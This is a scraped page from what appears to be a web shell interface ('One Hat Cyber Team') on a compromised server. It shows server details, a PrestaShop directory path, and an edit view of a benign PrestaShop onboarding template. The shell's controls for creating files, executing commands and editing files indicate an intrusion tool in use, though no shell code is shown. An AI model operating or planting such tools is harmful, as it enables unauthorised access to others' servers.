⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
olasjoys
/
modules
/
welcome
/
views
/
Edit File: content.tpl
{** * 2007-2020 PrestaShop and Contributors * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License 3.0 (AFL-3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/AFL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2020 PrestaShop SA and Contributors * @license https://opensource.org/licenses/AFL-3.0 Academic Free License 3.0 (AFL-3.0) * International Registered Trademark & Property of PrestaShop SA *} <div class="onboarding-advancement" style="display: none"> <div class="advancement-groups"> {foreach from=$steps.groups item=group key=index} <div class="group group-{$index}" style="width: {math equation="(x / y) * 100" x=$group.steps|@count y=$totalSteps}%;"> <div class="advancement" style="width: {$percent_real}%;"></div> <div class="id">{$index+1}</div> </div> {/foreach} </div> <div class="col-md-8"> <h4 class="group-title"></h4> <div class="step-title step-title-1"></div> <div class="step-title step-title-2"></div> </div> <button class="btn btn-primary onboarding-button-next">{l s='Continue' d='Modules.Welcome.Admin'}</button> <a class="onboarding-button-shut-down">{l s='Skip this tutorial' d='Modules.Welcome.Admin'}</a> </div> <script type="text/javascript"> var onBoarding; $(function(){ onBoarding = new OnBoarding({$currentStep}, {$jsonSteps nofilter}, {$isShutDown}, "{$link->getAdminLink('AdminWelcome')}", baseAdminDir); {foreach from=$templates item=template} onBoarding.addTemplate('{$template['name']}', '{$template['content']}'); {/foreach} onBoarding.showCurrentStep(); var body = $("body"); body.delegate(".onboarding-button-next", "click", function(){ if ($(this).is('.with-spinner')) { if (!$(this).is('.animated')) { $(this).addClass('animated'); onBoarding.gotoNextStep(); } } else { onBoarding.gotoNextStep(); } }).delegate(".onboarding-button-shut-down", "click", function(){ onBoarding.setShutDown(true); }).delegate(".onboarding-button-resume", "click", function(){ onBoarding.setShutDown(false); }).delegate(".onboarding-button-goto-current", "click", function(){ onBoarding.gotoLastSavePoint(); }).delegate(".onboarding-button-stop", "click", function(){ onBoarding.stop(); }); }); </script>
Simpan